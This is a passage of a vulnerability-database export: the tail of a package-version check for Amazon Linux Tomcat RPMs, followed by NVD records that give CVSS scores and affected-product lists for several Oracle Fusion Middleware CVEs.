reference:\"tomcat7-el-2.2-api-7.0.82-1.30.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-javadoc-7.0.82-1.30.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-jsp-2.2-api-7.0.82-1.30.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-lib-7.0.82-1.30.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-log4j-7.0.82-1.30.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-servlet-3.0-api-7.0.82-1.30.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-webapps-7.0.82-1.30.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-8.5.23-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-admin-webapps-8.5.23-1.75.amzn1\")) 
flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-docs-webapp-8.5.23-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-el-3.0-api-8.5.23-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-javadoc-8.5.23-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-jsp-2.3-api-8.5.23-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-lib-8.5.23-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-log4j-8.5.23-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-servlet-3.1-api-8.5.23-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-webapps-8.5.23-1.75.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-8.0.47-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-admin-webapps-8.0.47-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-docs-webapp-8.0.47-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-el-3.0-api-8.0.47-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-javadoc-8.0.47-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-jsp-2.3-api-8.0.47-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-lib-8.0.47-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-log4j-8.0.47-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-servlet-3.1-api-8.0.47-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat80-webapps-8.0.47-1.78.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat7 / tomcat7-admin-webapps / tomcat7-docs-webapp / 
etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2023-12-06T14:15:20", "description": "Vulnerability in the Oracle Access Manager component of Oracle Fusion Middleware (subcomponent: Web Server Plugin). The supported version that is affected is 11.1.2.3.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle Access Manager. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Access Manager accessible data. CVSS 3.0 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-01-18T02:29:00", "type": "cve", "title": "CVE-2017-10262", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10262"], "modified": "2018-01-25T13:52:00", "cpe": ["cpe:/a:oracle:access_manager:11.1.2.3.0"], "id": "CVE-2017-10262", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10262", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, 
"cpe23": ["cpe:2.3:a:oracle:access_manager:11.1.2.3.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T14:15:26", "description": "Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: Deployment). Supported versions that are affected are 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 and 12.2.1.2.0. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle JDeveloper executes to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data as well as unauthorized read access to a subset of Oracle JDeveloper accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle JDeveloper. CVSS 3.0 Base Score 4.7 (Confidentiality, Integrity and Availability impacts). 
CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L).", "cvss3": {"exploitabilityScore": 0.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.7}, "published": "2018-01-18T02:29:00", "type": "cve", "title": "CVE-2017-10273", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.7, "vectorString": "AV:L/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10273"], "modified": "2018-01-25T13:52:00", "cpe": ["cpe:/a:oracle:jdeveloper:12.2.1.2.0", "cpe:/a:oracle:jdeveloper:12.1.3.0.0", "cpe:/a:oracle:jdeveloper:11.1.1.7.1", "cpe:/a:oracle:jdeveloper:11.1.1.9.0", "cpe:/a:oracle:jdeveloper:11.1.1.7.0", "cpe:/a:oracle:jdeveloper:11.1.2.4.0"], "id": "CVE-2017-10273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10273", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:jdeveloper:11.1.2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:11.1.1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:11.1.1.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:12.2.1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T14:16:04", "description": "Vulnerability in the Oracle WebLogic Server 
component of Oracle Fusion Middleware (subcomponent: WLS - Web Services). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. While the vulnerability is in Oracle WebLogic Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle WebLogic Server as well as unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data and unauthorized read access to a subset of Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 9.9 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 9.9, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.3}, "published": "2017-10-19T17:29:00", "type": "cve", "title": "CVE-2017-10352", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10352"], "modified": 
"2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:weblogic_server:12.1.3.0.0", "cpe:/a:oracle:weblogic_server:12.2.1.2.0", "cpe:/a:oracle:weblogic_server:12.2.1.3.0", "cpe:/a:oracle:weblogic_server:10.3.6.0.0", "cpe:/a:oracle:weblogic_server:12.2.1.1.0"], "id": "CVE-2017-10352", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10352", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:weblogic_server:12.2.1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T14:13:39", "description": "Vulnerability in the Oracle Business Intelligence Enterprise Edition component of Oracle Fusion Middleware (subcomponent: Analytics Web Dashboards). The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). 
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 4.7}, "published": "2018-01-18T02:29:00", "type": "cve", "title": "CVE-2017-10068", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10068"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:business_intelligence:12.2.1.3.0"], "id": "CVE-2017-10068", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10068", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:oracle:business_intelligence:12.2.1.3.0:*:*:*:enterprise:*:*:*"]}, {"lastseen": "2023-12-06T15:13:36", "description": "Vulnerability in the Oracle HTTP Server component of Oracle Fusion Middleware (subcomponent: Web Listener). Supported versions that are affected are 11.1.1.7.0, 11.1.1.9.0, 12.1.3.0.0, 12.2.1.2.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle HTTP Server. 
Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle HTTP Server. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2018-01-18T02:29:00", "type": "cve", "title": "CVE-2018-2561", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2561"], "modified": "2018-01-25T13:53:00", "cpe": ["cpe:/a:oracle:http_server:12.2.1.3.0", "cpe:/a:oracle:http_server:11.1.1.9.0", "cpe:/a:oracle:http_server:12.2.1.2.0", "cpe:/a:oracle:http_server:12.1.3.0.0", "cpe:/a:oracle:http_server:11.1.1.7.0"], "id": "CVE-2018-2561", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2561", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:oracle:http_server:11.1.1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:http_server:12.2.1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:http_server:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:http_server:12.2.1.3.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:oracle:http_server:11.1.1.9.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T15:13:37", "description": "Vulnerability in the Oracle WebCenter Content component of Oracle Fusion Middleware (subcomponent: Content Server). The supported version that is affected is 11.1.1.9.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebCenter Content. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Content, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle WebCenter Content accessible data as well as unauthorized read access to a subset of Oracle WebCenter Content accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 4.7}, "published": "2018-01-18T02:29:00", "type": "cve", "title": "CVE-2018-2564", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 
4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2564"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:webcenter_content:11.1.1.9.0"], "id": "CVE-2018-2564", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2564", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:oracle:webcenter_content:11.1.1.9.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T15:14:28", "description": "Vulnerability in the Oracle Business Intelligence Enterprise Edition component of Oracle Fusion Middleware (subcomponent: BI Platform Security). Supported versions that are affected are 12.2.1.2.0 and 12.2.1.3.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.0 Base Score 6.5 (Confidentiality impacts). 
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-01-18T02:29:00", "type": "cve", "title": "CVE-2018-2715", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2715"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/a:oracle:business_intelligence:12.2.1.3.0", "cpe:/a:oracle:business_intelligence:12.2.1.2.0"], "id": "CVE-2018-2715", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2715", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:oracle:business_intelligence:12.2.1.2.0:*:*:*:enterprise:*:*:*", "cpe:2.3:a:oracle:business_intelligence:12.2.1.3.0:*:*:*:enterprise:*:*:*"]}, {"lastseen": "2023-12-06T14:05:46", "description": "Unspecified vulnerability in the Enterprise Manager Ops Center component in Oracle Enterprise Manager Grid Control 12.1.4, 12.2.2, and 12.3.2; the Oracle Health Sciences Information Manager component in Oracle Health Sciences Applications 1.2.8.3, 2.0.2.3, and 3.0.1.0; the Oracle Healthcare Master Person Index component in Oracle Health Sciences Applications 
2.0.12, 3.0.0, and 4.0.1; the Oracle Documaker component in Oracle Insurance Applications before 12.5; the Oracle Insurance Calculation Engine component in Oracle Insurance Applications 9.7.1, 10.1.2, and 10.2.2; the Oracle Insurance Policy Administration J2EE and Oracle Insurance Rules Palette components in Oracle Insurance Applications 9.6.1, 9.7.1, 10.0.1, 10.1.2, 10.2.0, and 10.2.2; the Oracle Retail Integration Bus component in Oracle Retail Applications 15.0; the Oracle Retail Order Broker component in Oracle Retail Applications 5.1, 5.2, and 15.0; the Primavera Contract Management component in Oracle Primavera Products Suite 14.2; the Primavera P6 Enterprise Project Portfolio Management component in Oracle Primavera Products Suite 8.2, 8.3, 8.4, 15.1, 15.2, and 16.1; the Oracle Financial Services Analytical Applications Infrastructure component in Oracle Financial Services Applications 8.0.0, 8.0.1, 8.0.2, and 8.0.3; the Oracle Commerce Guided Search / Oracle Commerce Experience Manager component in Oracle Commerce 3.1.1, 3.1.2, 11.0, 11.1, and 11.2; the Oracle Agile PLM component in Oracle Supply Chain Products Suite 9.3.4 and 9.3.5; the Oracle Communications BRM - Elastic Charging Engine 11.2.0.0.0 and 11.3.0.0.0; the Oracle Enterprise Repository Enterprise Repository 12.1.3.0.0; the Oracle Financial Services Behavior Detection Platform 8.0.1 and 8.0.2; the Oracle Hyperion Essbase 12.2.1.1; the Oracle Tuxedo System and Applications Monitor (TSAM) 11.1.1.2.0, 11.1.1.2.1, 11.1.1.2.1, 12.1.1.1.0, 12.1.3.0.0, and 12.2.2.0.0; the Oracle Communications WebRTC Session Controller component of Oracle Communications Applications (subcomponent: Security (Spring)) 7.0, 7.1 and 7.2; the Oracle Endeca Information Discovery Integrator 3.2; the Converged Commerce component of Oracle Retail Applications 16.0.1; the Oracle Identity Manager 11.1.2.3.0; Oracle Enterprise Manager for MySQL Database 12.1.0.4; Oracle Retail Invoice Matching 12.0, 13.0, 13.1, 13.2, 14.0, and 
14.1; Oracle Communications Performance Intelligence Center (PIC) Software Prior to 10.2.1 and the Oracle Knowledge component of Oracle Siebel CRM (subcomponent: AnswerFlow (Spring Framework)) version 8.5.1.0 - 8.5.1.7 and 8.6.0 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-07-21T10:12:00", "type": "cve", "title": "CVE-2016-0635", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0635"], "modified": "2019-04-23T19:29:00", "cpe": ["cpe:/a:oracle:insurance_calculation_engine:10.2.2", "cpe:/a:oracle:insurance_rules_palette:9.7.1", "cpe:/a:oracle:insurance_calculation_engine:10.1.2", "cpe:/a:oracle:primavera_contract_management:14.2", "cpe:/a:oracle:retail_order_broker_cloud_service:15.0", "cpe:/a:oracle:insurance_rules_palette:9.6.1", "cpe:/a:oracle:insurance_rules_palette:10.0.1", "cpe:/a:oracle:insurance_rules_palette:10.1.2", "cpe:/a:oracle:health_sciences_information_manager:1.2.8.3", "cpe:/a:oracle:insurance_policy_administration_j2ee:10.2.2", 
"cpe:/a:oracle:healthcare_master_person_index:2.0.12", "cpe:/a:oracle:health_sciences_information_manager:2.0.2.3", "cpe:/a:oracle:healthcare_master_person_index:3.0.0", "cpe:/a:oracle:insurance_policy_administration_j2ee:10.1.2", "cpe:/a:oracle:retail_order_broker_cloud_service:5.1", "cpe:/a:oracle:retail_order_broker_cloud_service:5.2", "cpe:/a:oracle:health_sciences_information_manager:3.0.1.0", "cpe:/a:oracle:insurance_policy_administration_j2ee:10.0.1", "cpe:/a:oracle:healthcare_master_person_index:4.0.1", "cpe:/a:oracle:enterprise_manager_ops_center:12.1.4", "cpe:/a:oracle:retail_integration_bus:15.0", "cpe:/a:oracle:primavera_p6_enterprise_project_portfolio_management:8.2", "cpe:/a:oracle:insurance_policy_administration_j2ee:9.7.1", "cpe:/a:oracle:insurance_calculation_engine:9.7.1", "cpe:/a:oracle:enterprise_manager_ops_center:12.3.2", "cpe:/a:oracle:documaker:12.5", "cpe:/a:oracle:primavera_p6_enterprise_project_portfolio_management:15.1", "cpe:/a:oracle:insurance_policy_administration_j2ee:9.6.1", "cpe:/a:oracle:primavera_p6_enterprise_project_portfolio_management:8.3", "cpe:/a:oracle:insurance_rules_palette:10.2.2", "cpe:/a:oracle:primavera_p6_enterprise_project_portfolio_management:15.2", "cpe:/a:oracle:insurance_rules_palette:10.2.0", "cpe:/a:oracle:enterprise_manager_ops_center:12.2.2", "cpe:/a:oracle:insurance_policy_administration_j2ee:10.2.0", "cpe:/a:oracle:primavera_p6_enterprise_project_portfolio_management:16.1", "cpe:/a:oracle:primavera_p6_enterprise_project_portfolio_management:8.4"], "id": "CVE-2016-0635", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0635", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:oracle:insurance_policy_administration_j2ee:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:health_sciences_information_manager:3.0.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:9.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_order_broker_cloud_service:15.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:oracle:insurance_rules_palette:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:9.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:8.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:9.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:health_sciences_information_manager:2.0.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:15.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:healthcare_master_person_index:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:16.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_contract_management:14.2:*:*:*:*:*:*:*", 